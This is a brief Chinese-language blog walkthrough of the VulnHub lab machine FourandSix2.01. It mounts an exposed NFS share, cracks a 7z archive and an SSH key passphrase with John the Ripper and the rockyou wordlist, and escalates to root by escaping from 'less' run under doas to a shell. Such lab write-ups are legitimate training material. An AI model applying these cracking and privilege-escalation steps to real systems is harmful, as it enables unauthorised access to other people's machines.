vulnhub FourandSix2.01

0x01 端口扫描

开放22和2049的nfs服务,且系统是OpenBSD 6.0

OpenBSD 6.0 是一个高度安全和稳定的操作系统,适合用于服务器、防火墙、路由器和安全敏感的开发环境。它通过默认的安全配置和严格的代码审查,提供了一个可靠的计算平台。

0x02 nfs渗透


挂载上去,拿到压缩包

0x03 misc

7z爆破

1
7z x 1.7z

有密码,john破解

1
2
3
4
# 提取 7z 文件的哈希 
/usr/share/john/7z2john.pl 1.7z > 1.hash 
# 使用 John the Ripper 进行破解 
john --format=7z 1.hash

ssh私钥爆破

1
2
3
#提取哈希
ssh2john id_rsa > ssh.hash
john ssh.hash --wordlist=/usr/share/wordlists/rockyou.txt

拿到立足点

0x04 提权

1
doas /usr/bin/less /var/log/authlog

less读取文件后,按v进入vi,再输:!/bin/sh开启root shell


vulnhub
#pentest
vulnhub FourandSix2.01
https://fyhypo.github.io/blog/vulnhub/vulnhub FourandSix2.01/
作者
FYHypo
发布于
2024年8月31日
许可协议